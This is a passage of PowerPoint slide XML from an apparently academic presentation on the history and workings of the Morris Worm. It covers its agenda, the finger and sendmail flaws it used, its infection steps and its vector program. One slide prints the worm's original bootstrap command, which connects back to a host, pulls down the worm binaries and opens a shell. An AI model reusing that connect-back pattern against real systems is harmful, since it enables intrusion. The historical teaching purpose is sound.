                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="37" name="Gerade Verbindung mit Pfeil 36"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="38" idx="3"/>
                <a:endCxn id="36" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790596" y="5230925"/>
                <a:ext cx="493663" cy="54993"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Grafik 41"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7811868" y="2872265"/>
              <a:ext cx="1506716" cy="1968186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="Gruppieren 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4590550" y="3865454"/>
              <a:ext cx="6608453" cy="1766704"/>
              <a:chOff x="4476250" y="3460336"/>
              <a:chExt cx="6608453" cy="1766704"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Textfeld 43"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7697567" y="4403745"/>
                <a:ext cx="3387136" cy="823295"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>4. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Pfeil: nach rechts 44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="4476250" y="3460336"/>
                <a:ext cx="3171463" cy="27779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grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="984746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Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Foliennummernplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0D37D001-F938-4858-B8AD-AB5D5789354B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Fußzeilenplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Paper Presentation – Distributed Information Processing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteck 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="1404130"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rechteck 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="1350818"/>
            <a:ext cx="7920992" cy="736490"/>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History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="2317984"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="2256875"/>
            <a:ext cx="7920992" cy="1322172"/>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Foundations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Worm vs. Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flaws of the Systems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finger(d), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, Passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted Logins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669866" y="3809723"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604592" y="3748614"/>
            <a:ext cx="7920992" cy="1321200"/>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521437">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Functionality of the Morris Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>High-Level Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="978637" lvl="1" indent="-457200" defTabSz="521437">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Detailed Functionalities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668592" y="5298878"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608042" y="5239381"/>
            <a:ext cx="7920992" cy="735006"/>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Aftermath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3534309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Morris Worm: Vector Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./x14481910 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>128.32.134.16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32341</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8712440</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vector Program connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>specified port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authenticated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>magic number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Magic number acted as an one-time challenge password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm on the host machines waits up to 2 min for response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection established, then transferring 3 files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sun 3 binary version of the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VAX version of the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source code of the vector program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vector program becomes a shell (via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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20</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Gruppieren 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9518687" y="78043"/>
            <a:ext cx="2415567" cy="943335"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="10880559" cy="3882150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Textfeld 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253205"/>
              <a:ext cx="2488554" cy="949954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Grafik 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rechteck 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Verbinder: gewinkelt 26"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="26" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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28" name="Gruppieren 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159884" y="1891281"/>
              <a:ext cx="4636280" cy="1399141"/>
              <a:chOff x="3159884" y="1891281"/>
              <a:chExt cx="4636280" cy="1399141"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Gruppieren 42"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1891281"/>
                <a:ext cx="3182464" cy="1399141"/>
                <a:chOff x="4476250" y="1520888"/>
                <a:chExt cx="3182464" cy="1399141"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Textfeld 44"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560252" y="1520888"/>
                  <a:ext cx="3071495" cy="823296"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="Pfeil: nach rechts 45"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="277793"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="44" name="Gerade Verbindung mit Pfeil 43"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="26" idx="3"/>
                <a:endCxn id="45" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159884" y="2293071"/>
                <a:ext cx="1537816" cy="9860"/>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29" name="Gruppieren 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2249572"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2249572"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Gruppieren 34"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1076616"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1076616"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="Textfeld 38"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1076616"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="40" name="Gruppieren 39"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="41" name="Pfeil: nach oben gekrümmt 40"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="42" name="Pfeil: nach oben gekrümmt 41"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
